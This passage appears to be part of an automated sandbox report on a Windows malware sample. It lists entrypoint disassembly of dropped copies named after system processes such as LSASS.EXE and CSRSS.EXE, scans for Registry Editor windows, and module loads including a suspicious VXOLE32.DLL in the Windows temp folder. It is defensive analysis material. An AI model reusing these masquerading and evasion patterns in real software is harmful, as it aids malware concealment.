al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4741.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE5073.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4745.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4E36.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"RegEdit_RegEdit\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for window \"Registry Editor\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for window \"Folder Options\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for window \"Local Settings\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"ExploreWClass\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"CabinetWClass\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"RebarWindow32\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"ComboBoxEx32\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"ComboBox\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"Edit\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"KERNEL32\" at base 76e70000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"SXS.DLL\" at base 759d0000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"DWMAPI.DLL\" at base 74320000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"OLE32.DLL\" at base 768d0000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"USER32\" at base 76340000\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 759d0000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 74320000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 768d0000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"D3_08.exe\" loaded module \"USER32\" at base 76340000\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76e70000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74320000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76e70000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 768d0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76340000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 759d0000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76e70000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 768d0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76340000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 759d0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76e70000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 759d0000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74320000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 768d0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76340000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76e70000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb20000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 759d0000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 768d0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76340000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76830000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 759d0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 754d0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75260000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759c0000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e70000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76f70000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 768d0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74990000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 764a0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74610000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e70000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75e00000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d40000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f40000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76340000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76e70000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75970000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71230000\n \"SMSS.EXE\" 